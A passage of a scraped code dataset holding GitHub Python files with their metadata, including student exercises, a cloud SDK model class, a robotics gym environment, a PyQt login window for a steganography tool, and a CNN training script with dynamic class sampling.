int(input(\"enter the lenght in inches: \"))\n\nto_inch = var_in_ft * 12 \nto_cm = to_inch * 2.54 \nto_cm += (var_in_inch * 2.54) \nto_m = (to_cm / 100)\n\n\nprint(\"length in \" + str(var_in_ft) + \" ft will be in \" + str(to_m) + \" metres.\" )\n\n\n\n","repo_name":"asishraz/banka_sir_notes","sub_path":"ch_1/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1247598802","text":"def solution(scores):\n min_val = scores[0]\n max_val = scores[0]\n min_count = 0\n max_count = 0\n\n for i in range(len(scores)):\n if(scores[i] > max_val):\n max_val = scores[i]\n max_count += 1\n\n if(scores[i] < min_val):\n min_val = scores[i]\n min_count += 1\n\n return [max_count, min_count]\n\nif __name__ == '__main__':\n scores = [10, 5, 20, 20, 4, 5, 2, 25, 1]\n x = solution(scores)\n print(x)","repo_name":"Somenath95/hackerrank_practice","sub_path":"ex_2_breaking_best_and_worst.py","file_name":"ex_2_breaking_best_and_worst.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73628775799","text":"class FlowLog(object):\n\n def __init__(self, flowLogId=None, flowLogName=None, description=None, flowLogType=None, flowLogStatus=None, collectResources=None, 
collectTrafficType=None, collectInterval=None, storageRegionId=None, storageType=None, storageId=None, createdTime=None):\n        \"\"\"\n        :param flowLogId: (Optional) Flow log ID\n        :param flowLogName: (Optional) Flow log name; only Chinese characters, digits, upper/lower-case letters, underscores \"_\" and hyphens \"-\" are allowed; must not be empty and must not exceed 32 characters\n        :param description: (Optional) Description; any UTF-8 characters are allowed, up to 256 characters\n        :param flowLogType: (Optional) Flow log type\nPORT: collected resources include cloud hosts and elastic network interfaces\n\n        :param flowLogStatus: (Optional) Flow log status\nRUNNING: collecting\nSTOPPED: collection stopped\n\n        :param collectResources: (Optional) List of collected resources\n        :param collectTrafficType: (Optional) Collected traffic type\nALL: record all traffic of the specified resources.\nACCEPT: record traffic of the specified resources that is accepted by both the security group and the network ACL.\nREJECT: record traffic of the specified resources that is rejected by the security group or the network ACL.\n\n        :param collectInterval: (Optional) Flow log collection interval, in minutes. Allowed values: 1, 5, 10\n        :param storageRegionId: (Optional) Region of the flow log storage service\n        :param storageType: (Optional) Storage service type of the flow log\nLOG: log service\n\n        :param storageId: (Optional) Storage service ID for the flow log data\n        :param createdTime: (Optional) Flow log creation time\n        \"\"\"\n\n        self.flowLogId = flowLogId\n        self.flowLogName = flowLogName\n        self.description = description\n        self.flowLogType = flowLogType\n        self.flowLogStatus = flowLogStatus\n        self.collectResources = collectResources\n        self.collectTrafficType = collectTrafficType\n        self.collectInterval = collectInterval\n        self.storageRegionId = storageRegionId\n        self.storageType = storageType\n        self.storageId = storageId\n        self.createdTime = createdTime\n","repo_name":"jdcloud-api/jdcloud-sdk-python","sub_path":"jdcloud_sdk/services/flowlog/models/FlowLog.py","file_name":"FlowLog.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"40"}
+{"seq_id":"19036888760","text":"\"\"\"\n@brief Configuration script for the place task of the rail over \n            the kidney.\n@author Claudia D'Ettorre (c.dettorre@ucl.ac.uk)\n@date 03 Sep 2020\n\"\"\"\n\nfrom gym import utils\nfrom dVRL_simulator.PsmEnv_Position_reachkid import PSMEnv_Position_reachkid\nimport numpy as np\n\n\nclass PSMReachKidneyEnv(PSMEnv_Position_reachkid):#, utils.EzPickle):\n    def __init__(self, psm_num=1, reward_type='sparse', \n                 randomize_obj=True, randomize_ee=True,\n                 #randomize_grasp=False, \n                 randomize_kid = False, randomize_kid_or=False,\n                 randomize_target_point=True, # test\n                 action_type='continuous'):\n        initial_pos_ee=np.array([0, 0, -0.07])\n        initial_pos_k=np.array([0.05, 0.07, 0])\n        #initial_pos_k=np.array([0.05, -0.05, 0])\n\n        super(PSMReachKidneyEnv, self).__init__(\n            psm_num=psm_num, n_substeps=1, \n            block_gripper=True,\n            has_object=True, \n            target_in_the_air=True, \n            height_offset=0.0001,\n            target_offset=[0,0,0.038], \n            obj_range=0.025, \n            target_range=0.075,\n            distance_threshold=0.003, \n            initial_pos=initial_pos_ee, \n            initial_pos_k=initial_pos_k, \n            reward_type=reward_type,\n            dynamics_enabled=False, \n            two_dimension_only=False, \n            randomize_initial_pos_ee=randomize_ee,\n            randomize_initial_pos_obj=randomize_obj, \n\t\t\trandomize_initial_pos_kidney=randomize_kid, \n            randomize_initial_or_kidney=randomize_kid_or,\n            # To debug\n            randomize_target_point=randomize_target_point, # test\n            #randomize_grasping_site=randomize_grasp, # test\n\t\t\t#randomize_initial_or_obj=False, # test \n            action_type=action_type,\n            docker_container = self.__class__.__name__.lower())\n\n        utils.EzPickle.__init__(self)\n","repo_name":"Cladett/rlman","sub_path":"dVRL_simulator/environments/reachkidney_backup.py","file_name":"reachkidney_backup.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"}
+{"seq_id":"35952305528","text":"import 
os\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\n\n\nclass DataPreprocessing:\n    def __init__(self):\n        self.scaler_input = MinMaxScaler()\n        self.scaler_output = MinMaxScaler()\n        self.input_steps = 18\n        self.output_steps = 6\n        self.input_steps_categoria = 90\n        self.output_steps_categoria = 30\n        self.fitxerModel = os.path.join('model', 'model.h5')\n        self.hyperparameter_ranges = {\n            \"n_layers\": [1, 30],\n            \"num_units_layer\": [16, 200],\n            \"lr\": [1e-4, 1e-2],\n            \"n_epochs\": [100, 300],\n            \"batch_size\": [16, 64]\n        }\n\n    @staticmethod\n    def set_data():\n        archivo_entrada = os.path.join(\".\", \"..\", \"dades\", \"Dades_Per_entrenar.csv\")\n        pre_process = DataPreprocessing()\n        data = pre_process.read_data(archivo_entrada)\n        return data\n\n    def read_data(self, nomFitxer=None):\n        data = pd.read_csv(nomFitxer, sep=\";\", parse_dates=[0])\n        return data\n\n    def preprocess_data(self, data_prediccion=None):\n        data_procesada = data_prediccion.copy()\n        data_procesada[data_procesada.columns[2:]] = data_procesada.iloc[:, 2:].astype(float)\n        data_procesada = pd.get_dummies(data_procesada, columns=['Gran Grup'], prefix='Gran Grup')\n        data_procesada.iloc[:, 4:-5] = self.scaler_input.fit_transform(data_procesada.iloc[:, 4:-5])\n        data_procesada.iloc[:, 1:4] = self.scaler_output.fit_transform(data_procesada.iloc[:, 1:4])\n        data_procesada = data_procesada.drop(data_procesada.columns[0], axis=1)\n        data_procesada = data_procesada.dropna()\n        return data_procesada\n\n    def split_data(self, data_procesada):\n        train_size = int(len(data_procesada) * 0.7)\n        train_data = data_procesada[:train_size]\n        test_data = data_procesada[train_size:]\n        x_train, y_train = self.create_sequences(train_data)\n        x_test, y_test = self.create_sequences(test_data)\n        return x_train, y_train, x_test, y_test\n\n    def create_sequences(self, data):\n        X, y = [], []\n        for i in range(len(data) - self.input_steps_categoria - self.output_steps_categoria + 1):\n            input_data = data.iloc[i:i + self.input_steps_categoria, [0, *range(4, data.shape[1])]].values\n            output_data = data.iloc[\n                i + self.input_steps_categoria:i + self.input_steps_categoria + self.output_steps_categoria,\n                0:3].values\n            self.output_column_names = data.columns[3:6].tolist()\n            X.append(input_data)\n            y.append(output_data)\n        return np.array(X), np.array(y)\n\n    def create_sequences_for_prediction(self, data):\n        \"\"\"\n        Build input sequences from the processed dataset in order to run predictions.\n        \"\"\"\n        if len(data) < self.input_steps_categoria:\n            raise ValueError(\n                f\"At least {self.input_steps_categoria} records are required in the data for prediction.\")\n        input_data = data.iloc[-self.input_steps_categoria:, [0, *range(4, data.shape[1])]].values\n        return np.array([input_data])\n\n","repo_name":"u1050411/RNN_LLE2","sub_path":"src/data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"8604899354","text":"from kivy.utils import platform\r\nif platform == 'android':\r\n    from jnius import autoclass\r\n\r\n    # Import the required Android classes\r\n    MediaPlayer2 = autoclass('android.media.MediaPlayer')\r\n    Uri2 = autoclass('android.net.Uri')\r\n    PythonActivity2 = autoclass('org.kivy.android.PythonActivity')\r\n\r\n    # Create a new MediaPlayer object\r\n    player2 = MediaPlayer2()\r\nelse:\r\n    MediaPlayer2 = None\r\n    Uri2 = None\r\n    PythonActivity2 = 
None\r\n player2 = None","repo_name":"issacwillianDEV/spotfree","sub_path":"media_player.py","file_name":"media_player.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71276764920","text":"import datetime\nimport os\nimport json\n\nfrom typing import List\n\nclass DataTypeNotSuppoetedForIngestionException(Exception):\n def __init__(self, data):\n self.data = data\n self.message = f\"Data Type {type(data)} is not supported for ingestion\"\n super().__init__(self.message)\n\n\nclass DataWriter():\n def __init__(self, coin: str, api: str) -> None:\n self.coin = coin\n self.api = api\n self.filename = f\"{self.api}/{self.coin}/{datetime.datetime.now()}.json\"\n \n def _write_row(self, row: str) -> None:\n os.makedirs(os.path.dirname(self.filename), exist_ok = True)\n # insere os dados no modo append\n with open(self.filename, \"a\") as f:\n f.write(row)\n \n def write(self, data: [List, dict]):\n # isinstance verifica a classe do tipo data\n if isinstance(data, dict):\n self._write_row(json.dumps(data) + \"\\n\")\n elif isinstance(data, List):\n for element in data:\n self.write(element)\n else:\n raise DataTypeNotSuppoetedForIngestionException(data)\n","repo_name":"danielvolponi/bootcamp_how_engenharia_dados","sub_path":"05-capturando-dados-api/mercado_bitcoin/writers.py","file_name":"writers.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11750472370","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Sep 6 19:21:18 2019\r\n\r\n@author: pepe8\r\n\"\"\"\r\nimport pandas as pd\r\nimport random \r\nimport numpy as np \r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nalunos = ['joão', 'gabriel', 'gustavo']\r\n\r\nsorteio = random.choices(alunos, k=1)\r\nprint(alunos)\r\n\r\n## distribuição aleatoria triangular\r\nstart_time = datetime.now()\r\nprint('inicio: ', start_time)\r\n\r\ndistribuicao = np.random.triangular(3.20,4.15,5,500000)\r\n# distribuição uniforme \r\n\r\n#distribuicao2 = np.random.uniform(3.20,5,1000000)\r\n\r\n#distribuição normal\r\n#distribuicao3 = np.random.normal(4.15,2,1000000)\r\n\r\n#print('media é de: {:.4f}'.format(np.mean(distribuicao)))\r\n#print('media é de: {:.4f}'.format(np.mean(distribuicao2)))\r\n#print('media é de: {:.4f}'.format(np.mean(distribuicao3)))\r\nplt.plot(distribuicao, bins = 100)\r\nplt.show()\r\n\r\ntermino = datetime.now()\r\n\r\nprint('tempo ', termino - start_time)","repo_name":"ppdejah/Tomada_dec_Financeira","sub_path":"Abrindo arquivo excel.py","file_name":"Abrindo arquivo excel.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3324927093","text":"#primer ajuste\n# Nota no funciona del todo bien a veces no se ejecuta a la primera y nunca logre que metiera los procesos de corrido (no supe como manipular los índices del ciclo for)\nimport random\n\n\nmemoria = []\n\ndef main():\n\n\tent=input(\"Asignar (0) o liberar (1): \")\n\n\ndef menu(opcion):\n\tif opcion == '0':\n\t\tAsignar()\n\telif opcion == '1':\n\t\tBorrar()\n\telse:\n\t\tprint(\"ingrese una opcion valida\")\n\t\n\ndef Consecutivos():# Calcula los espacios consecutivos vacíos en el arreglo\n\tglobal memoria\n\tconsecutivo=0\n\tanterior=0\n\tfor i in memoria:\n\t\tif i == '-':\n\t\t\tconsecutivo=consecutivo+1\n\t\t\tif anterior libre:\n\t\tprint (\"Espacio insuficiente 
delete a process to continue\")\n\telif Consecutivos() < tam:\n\t\tprint(\"compaction required\")\n\t\tCompactacion()\n\t\tReAsignando(pro, tam)\n\n\telse:\n\t\tReAsignando(pro, tam)\n\t\t\ndef ReAsignando(A, B):# B is the size of the process, A is the name of the process\n\tglobal memoria\n\tcont=0\n\tcont2=B\n\tfor i in (memoria):\n\t\t\tif i == '-' and cont2 > 0 :\n\t\t\t\tposi=Disponible(B)\n\t\t\t\tmemoria.remove('-')\n\t\t\t\tmemoria.insert(posi, A)\n\t\t\t\tcont=cont+1\n\t\t\t\tcont2=cont2-1\n\n\tMuestra()\n\ndef Disponible(C): # tries to find an empty slot large enough to host the process \n\tglobal memoria\n\tconsecutivo=0\n\tanterior=0\n\tind=0\n\tfor i in memoria:\n\t\tif i == '-':\n\t\t\tconsecutivo=consecutivo+1\n\t\t\tif anterior 0:\n            element.text = str(int(element.text) - 1)\n            element.redraw()\n\n    def select_timer(it, option):\n        self.timer = option\n        self.update_labels_and_fields()\n\n    def select_fiftymove(it, option):\n        self.fifty_move = option\n\n    def select_jit_draw(it, option):\n        self.current_jit_draw = option\n\n    def select_timeout(it, option):\n        self.timeout = option\n\n    def motion(it, collides, color):\n        if collides:\n            it.color = self.button_hover\n        else:\n            it.color = color()\n        it.redraw()\n\n    self.back_click = back_click\n    self.quit_click = quit_click\n    self.minutes_plus_click = partial(plus, element=lambda: self.minutes)\n    self.moves_plus_click = partial(plus, element=lambda: self.moves)\n    self.bonus_plus_click = partial(plus, element=lambda: self.bonus)\n    self.minutes_minus_click = partial(minus, element=lambda: self.minutes)\n    self.moves_minus_click = partial(minus, element=lambda: self.moves)\n    self.bonus_minus_click = partial(minus, element=lambda: self.bonus)\n    self.select_timer = select_timer\n    self.select_fiftymove = select_fiftymove\n    self.select_jit_draw = select_jit_draw\n    self.select_timeout = select_timeout\n    self.motion = partial(motion, color=lambda: self.button_color)\n    self.motion_options = partial(motion, color=lambda: self.value_color)\n\n    def update_labels_and_fields(self):\n        self.show_bonus = False\n        self.show_moves = False\n        if self.timer == TIMER_OPTIONS[\"moves_per_minutes\"]:\n            self.show_moves = True\n        elif self.timer == TIMER_OPTIONS[\"fischer_game\"]:\n            self.show_bonus = True\n\n    def save(self):\n        data = {\n            'timer': self.timer,\n            'minutes': int(self.minutes.value),\n            'moves': int(self.moves.value),\n            'bonus': int(self.bonus.value),\n            'fifty_move': self.fifty_move,\n            'jit_draw': self.current_jit_draw,\n            'timeout': self.timeout\n        }\n\n        try:\n            os.makedirs(os.path.abspath(self.data_dir))\n        except:\n            pass\n\n        with open(os.path.abspath(os.path.join(self.data_dir, 'config.json')),\n                  'w') as f:\n            json.dump(data, f)\n\n    def draw(self, delta_time):\n        \"\"\"Draws ConfigMenu\"\"\"\n        self.main_div.draw(self.game.screen)\n\n    def event(self, delta_time, event):\n        \"\"\"Checks for mouse hover and mouse click\"\"\"\n        if event.type == pygame.MOUSEMOTION:\n            self.main_div.motion(event.pos)\n        elif event.type == pygame.MOUSEBUTTONUP:\n            self.main_div.click(event.pos)\n\n    def resize(self):\n        ConfigMenuInterface.resize(self)\n","repo_name":"GRUPO-ES2-GJLRT/XADREZ_ES2","sub_path":"src/scenes/config_menu.py","file_name":"config_menu.py","file_ext":"py","file_size_in_byte":4411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"3168896241","text":"import rospy\nfrom sensor_msgs.msg import JointState\n\n## @brief This provides an interface to the \"fake_controller\" aspects of\n## 
MoveIt demo.launch files.\nclass FakeGroupInterface(object):\n \n ## @brief Signature intended to match real interface, params not used\n def __init__(self, group, frame, listener=None, plan_only=False):\n self.pub = rospy.Publisher(\"/move_group/fake_controller_joint_states\",\n JointState,\n queue_size=10)\n\n ## @brief This is modeled such that we can use the fake interface as a\n ## drop in replacement for the real interface.\n def moveToJointPosition(self, joints, positions, **kwargs):\n msg = JointState()\n msg.header.stamp = rospy.Time.now()\n msg.name = joints\n msg.position = positions\n self.pub.publish(msg)\n","repo_name":"mikeferguson/moveit_python","sub_path":"src/moveit_python/fake_group_interface.py","file_name":"fake_group_interface.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"40"} +{"seq_id":"6540047219","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom 主界面 import *\nfrom 信息隐藏工具 import *\nfrom 隐藏加密 import *\nfrom 隐藏解密 import *\nfrom 视频处理 import *\nfrom PyQt5.QtCore import pyqtSlot, pyqtSignal, QObject, QThread\nfrom PIL import Image\n\n\"\"\"\n取得一个 PIL 图像并且更改所有值为偶数(使最低有效位为 0)\n\"\"\"\n\n\n\n################################################\n#######创建主窗口\n################################################\nclass MainWindow(QMainWindow, Ui_MainWindow,QWidget):\n windowList = []\n sig_1 = pyqtSignal()\n def __init__(self, parent=None,*args,**kwargs):\n super(MainWindow, self).__init__(*args, **kwargs)\n self.setupUi(self)\n self.actionabout.triggered.connect(self.on_printAction1_triggered)\n # 创建动作 退出\n self.actionexit.triggered.connect(self.on_printAction2_triggered)\n\n\n # 动作一:注销\n def on_printAction1_triggered(self):\n self.close()\n dialog = Dialog(mode=1)\n if dialog.exec_()==QDialog.Accepted:\n the_window = MainWindow()\n self.windowList.append(the_window) #这句一定要写,不然无法重新登录\n the_window.show()\n\n # 动作二:退出\n def on_printAction2_triggered(self):\n self.close()\n\n # 关闭界面触发事件\n def closeEvent(self, event):\n print(999999999)\n pass\n\n################################################\n#######对话框\n################################################\n\nclass Dialog(QDialog,Ui_Dialog):\n\n def __init__(self, parent=None,mode=0,*args,**kwargs):\n\n super().__init__(*args, **kwargs)\n self.mode = mode\n ###### 绑定按钮事件\n ####初始化登录信息\n\n self.setupUi(self)\n ###### 绑定按钮事件\n self.pushButton.clicked.connect(self.on_pushButton_clicked)\n self.pushButton_2.clicked.connect(QCoreApplication.instance().quit)\n\n\n ####自动登录\n # 自动登录\n def goto_autologin(self):\n if self.checkBox_autologin.isChecked()==True and self.mode == 0 :\n self.on_pushButton_clicked()\n def on_pushButton_clicked(self):\n # 账号判断\n if self.lineEdit.text() == \"\":\n return\n\n # 密码判断\n if self.lineEdit_2.text() == \"\":\n return\n\n ####### 保存登录信息\n\n # 通过验证,关闭对话框并返回1\n self.accept()\n\n # 保存登录信息\n\n # 初始化登录信息\n\n\n################################################\n#######程序入门\n################################################\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n dialog = Dialog(mode=0)\n if dialog.exec_()==QDialog.Accepted:\n the_window = MainWindow()\n child1 = QWidget()\n child2 = QMainWindow()\n child3 = QWidget()\n child1_ui = Ui_Form1()\n child1_ui.setupUi(child1)\n child2_ui = Ui_Form2()\n child2_ui.setupUi(child2)\n child3_ui = Ui_Form3()\n child3_ui.setupUi(child3)\n # 按钮绑定事件\n btn1 = the_window.pushButton\n btn1.clicked.connect(child1.show)\n btn2 = 
the_window.pushButton_2\n btn2.clicked.connect(child2.show)\n btn3 = the_window.pushButton_3\n btn3.clicked.connect(child3.show)\n\n the_window.show()\n sys.exit(app.exec_())\n\n\n","repo_name":"invierno123/steganography","sub_path":"登录界面.py","file_name":"登录界面.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27643543820","text":"from torchvision.datasets import ImageFolder\nfrom torch.utils.data import WeightedRandomSampler, DataLoader\nimport torch.cuda\nimport torch.optim as optim\nfrom collections import Counter\nfrom math import ceil\nimport matplotlib.pyplot as plt\nimport time\n\nfrom neuralnet import *\nfrom datasets import *\nfrom train import *\nfrom dynamicsampler import *\nfrom unlabeledaccuracy import *\nfrom graphs import *\n\n# Key neural network hyperparameters (the classics)\nvalidation_size = 0.3 # Set to 0 < x < 1 to use x% of images from each class for the validation set, or x > 1 to use constant x images from each class for the validation set.\ndataset_expansion_multiplier = 0.1 # Sets the minimum number of images in the training set from each class to x% of the largest class. If a class has fewer images than the min, augmented duplicates are created.\nmax_images_trained = 10000000 # If after an epoch, the number of images that were trained on exceeds this number, the program stops training.\nbatch_size = 256 # Mini batch size \nlearning_rate = 0.03 # Initial learning rate\nlearning_rate_decay = 0.95 # Set to 0 < x <= 1 to have the learning rate decay (1 - x)% after each epoch (setting it to 1 will cause the learning rate to remain constant).\nmomentum = 0.9 # Affects how much results from previous gradient descents contribute to the current gradient descent.\n\n# Neural network dimensions\nconvolution_layer_width = 256 # Width of the convolution layers\nkernel1_size = 5 # Kernel size of first convolution layer\nkernel2_size = 5 # Kernel size of second convolution layer\nlinear_layer_width = 2048 # Width of linear layers\noutput_layer_width = 10 # Width of output layer (number of classes in dataset)\n\n# Dynamic sampling parameters\ndynamic_weights_power = 2 # Defines how much each class's f score affects its weights in the next epoch. Set to x >= 0, where x = 1 makes the relationship linear (x = 0 makes the weights static).\ndynamic_weights_dampening_min = 0 # The smallest amount of dampening that the dynamic sampler will apply\ndynamic_weights_dampening_max = 1 # The largest amount of dampening that the dynamic sampler will apply (this value is reaached asymptotically)\ndynamic_weights_dampening_initial = 0.1 # Initial amount of dampening\ndynamic_weights_dampening_forward_step_size = 0.1 # How much the dampening increases each time the threshold is reached\ndynamic_weights_dampening_reverse_step_size = 0.04 # How much the dampening decays each time the threshold is not reached\ndynamic_weights_dampening_step_threshold = 0.9 # If the weight of the largest sampled class falls below this threshold in one epoch, the dampening factor will increase by one step forward.\n\n# Unlabeled dataset simulation parameters\nrun_unlabeled_set_simulation = False # Before training the NN, runs the simulation. 
Set to 'False' if you are using a large validation set (more than one or two thousand).\nprint_unlabeled_set_simulation_results = False # Print all accuracies and confidence intervals obtained in simulation.\nerror_estimate_sample_size = 5000 # Number of random simulations that should be performed\nconfidence_interval = 0.95 # Used to showcase expected lower and upper bounds of model simulation\nprobability_weights_offset_min = 1000 # Lower bound for uniform portion of RNG\nprobability_weights_offset_max = 20000 # Upper bound for uniform portion of RNG\nprobability_weights_correlation = 0.12 # Governs how much the weights of indices moved from affect the weights of indices moved to (how much precision and recall are correlated)\nprobability_weights_base_min = 2 # Lower bound of base used for nonuniform portion of RNG\nprobability_weights_base_max = 2 # Upper bound (inclusive) of base used for nonuniform portion of RNG\nprobability_weights_power_min = 0 # Lower bound of exponent used for nonuniform portion of RNG\nprobability_weights_power_max = 19 # Upper bound (inclusive) of exponent used for nonuniform portion of RNG\n\nimage_analysis = True # Set to True to display ten different correctly and incorrectly predicted images as well as the NN's prediction probabilities for each of those images (after the last epoch)\nsave_images_to_folder = False # Set to True to save the images in the training, validation, and augmented validation sets to a folder (this will take a looong time, use a smaller set to test transformations)\n\n# Folder from which to get the images\nraw_image_folder_name = 'C:/Users/dwypy/source/repos/EARIN_Project/archive/train/EO'\n\n# Folders in which to save resulting training, validation, and augmented validation sets.\ntrain_image_folder_name = 'C:/Users/dwypy/source/repos/EARIN_Project/saved_images/temp_train'\nval_image_folder_name = 'C:/Users/dwypy/source/repos/EARIN_Project/saved_images/temp_val'\naugmented_val_image_folder_name = 'C:/Users/dwypy/source/repos/EARIN_Project/saved_images/temp_augmented_val'\n\n\n# Load the dataset\ndataset = ImageFolder(raw_image_folder_name)\n\n# Get the class labels\nclass_labels = dataset.classes\n\n# Get the targets of each image in the dataset\ntargets = dataset.targets\n\n# Get the indices of images in each class\nclass_indices = {class_label: np.where(np.array(targets) == i)[0] for i, class_label in enumerate(class_labels)}\n\n# Count the number of images in each class\ntotal_class_counts = {}\n\n# Gets the number of images in the training set, validation set, and combined set.\ntotal_class_counts, train_class_counts, val_class_counts = get_class_counts(dataset, validation_size, class_labels)\n\n# Creates the training, validation, and augmented validation sets.\ntrain_dataset, val_dataset, augmented_val_dataset = get_subsets(dataset, class_indices, val_class_counts, targets)\n\n# Find the size of the largest class\nmaximum_class_size = int(dataset_expansion_multiplier * max(train_class_counts.values()))\n\n# Calculate the number of augmentations needed for each class\naugmentations_per_class = {class_label: get_num_of_augmentations(maximum_class_size, count) for class_label, count in train_class_counts.items()}\n\n# Apply transformations to the data sets\ntrain_dataset = CustomDataset(train_dataset, train_class_counts, transform=transform_train, augmentations_per_class=augmentations_per_class)\nval_dataset = CustomDataset(val_dataset, val_class_counts, transform=transform_val)\naugmented_val_dataset = 
CustomDataset(augmented_val_dataset, val_class_counts, transform=transform_train)\n\n# Save the images from the training and validation sets \nif save_images_to_folder:\n save_images(train_dataset, train_image_folder_name)\n save_images(val_dataset, val_image_folder_name)\n save_images(augmented_val_dataset, augmented_val_image_folder_name)\n\n\n# Calculate the number of images in each class of the training dataset after it has been augmented\nnew_class_counts = {class_label: count + augmentations_per_class.get(class_label, 0) for class_label, count \n in train_class_counts.items()}\n\ntrain_labels = [train_dataset.dataset.targets[i] for i in train_dataset.indices]\n\n\ndyna_sampler = DynamicSampler(new_class_counts, train_labels, dynamic_weights_power, dynamic_weights_dampening_min, \n dynamic_weights_dampening_max, dynamic_weights_dampening_initial, dynamic_weights_dampening_forward_step_size, \n dynamic_weights_dampening_reverse_step_size, dynamic_weights_dampening_step_threshold)\n\n\n# Print relevant info about current test\nprint_test_info(batch_size, learning_rate, learning_rate_decay, momentum, validation_size, dataset_expansion_multiplier, max_images_trained, dyna_sampler)\n\n\n# Runs simulation to estimate accuracy and confidence interval of an unlabeled dataset. The accuracies obtained in the simulation are compared to the actual validation accuracies after each epoch.\nif run_unlabeled_set_simulation:\n sim_probabilities = SimulatedWeights(output_layer_width, error_estimate_sample_size, probability_weights_correlation, probability_weights_offset_min, \n probability_weights_offset_max, probability_weights_base_min, probability_weights_base_max, \n probability_weights_power_min, probability_weights_power_max)\n\n simulated_unlabeled_mean, simulated_unlabeled_confidence_interval = get_simulated_unlabeled_set_data(sim_probabilities, val_class_counts, confidence_interval, \n print_unlabeled_set_simulation_results)\n\n# Define data loaders\ntrain_loader = DataLoader(train_dataset, batch_size=batch_size, sampler=dyna_sampler.weighted_random_sampler)\nval_loader = DataLoader(val_dataset, batch_size=batch_size)\naugmented_val_loader = DataLoader(augmented_val_dataset, batch_size=batch_size)\n\n# Instantiate the network\nnet = Net(convolution_layer_width=convolution_layer_width, kernel1_size=kernel1_size, kernel2_size=kernel2_size, \n linear_layer_width=linear_layer_width, output_layer_width=output_layer_width)\n\n# Define the loss function and optimizer\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.SGD(net.parameters(), lr=learning_rate, momentum=momentum)\nscheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer, gamma=learning_rate_decay)\n\n# Print relevant info about neural network used\nprint(f\"\\nStructure of neural network:\\n\\n {net} \\n\")\n\n# Move the network and loss function to the GPU if available\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nnet.to(device)\ncriterion.to(device)\n\nimages_trained = 0\nepoch = 0\nstep = 0\nimage_analysis_final = False\n\n# Lists to store accuracy and loss values\ntrain_acc_values = []\nval_acc_values = []\naugmented_val_acc_values = []\nloss_values = []\nsimulated_model_accuracy = []\nsimulated_model_CI_lo = []\nsimulated_model_CI_hi = []\nsimulated_model_MSE = []\naug_simulated_model_accuracy = []\naug_simulated_model_CI_lo = []\naug_simulated_model_CI_hi = []\naug_simulated_model_MSE = []\n\nstart_time = time.time()\n\n# loop over the dataset multiple times\nwhile images_trained < max_images_trained:\n 
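# NOTE (added comment, not from the original author): training is budgeted by the\n # total number of images sampled rather than a fixed epoch count, so the dynamic\n # sampler's re-weighting changes how many epochs actually run.\n 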
print(f\"\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\")\n print('Epoch %d\\n\\nDampening: %.3f' % ((epoch + 1), dyna_sampler.current_dampening), ' LR: ', scheduler.get_last_lr())\n\n # Trains the neural network over one epoch\n loss_values, train_acc_values, all_labels_train, all_preds_train, total_train = train_neural_network(train_loader, epoch, net, device, optimizer, criterion, \n scheduler, loss_values, train_acc_values)\n \n # Decay Learning Rate\n scheduler.step()\n\n # Only perform image analysis after last epoch\n if image_analysis and (images_trained + total_train) >= max_images_trained:\n image_analysis_final = True\n\n # Run validation sets through neural network after each epoch\n with torch.no_grad():\n val_acc, total_displacement = check_validation_dataset(val_loader, net, device, image_analysis=image_analysis_final)\n val_acc_values.append(val_acc)\n\n if run_unlabeled_set_simulation:\n simulated_model_accuracy.append(simulated_unlabeled_mean[total_displacement])\n simulated_model_CI_lo.append(simulated_unlabeled_confidence_interval[total_displacement][0])\n simulated_model_CI_hi.append(simulated_unlabeled_confidence_interval[total_displacement][1])\n simulated_model_MSE.append(get_mean_squared_error(simulated_unlabeled_mean[total_displacement], val_acc))\n\n print_simulation_metrics(simulated_unlabeled_mean[total_displacement], simulated_unlabeled_confidence_interval[total_displacement], \n confidence_interval, simulated_model_MSE, epoch)\n\n augmented_val_acc, total_displacement = check_validation_dataset(augmented_val_loader, net, device, val_name=\"Augmented validation set\", image_analysis=image_analysis_final)\n augmented_val_acc_values.append(augmented_val_acc)\n \n if run_unlabeled_set_simulation:\n aug_simulated_model_accuracy.append(simulated_unlabeled_mean[total_displacement])\n aug_simulated_model_CI_lo.append(simulated_unlabeled_confidence_interval[total_displacement][0])\n aug_simulated_model_CI_hi.append(simulated_unlabeled_confidence_interval[total_displacement][1])\n aug_simulated_model_MSE.append(get_mean_squared_error(simulated_unlabeled_mean[total_displacement], augmented_val_acc))\n\n print_simulation_metrics(simulated_unlabeled_mean[total_displacement], 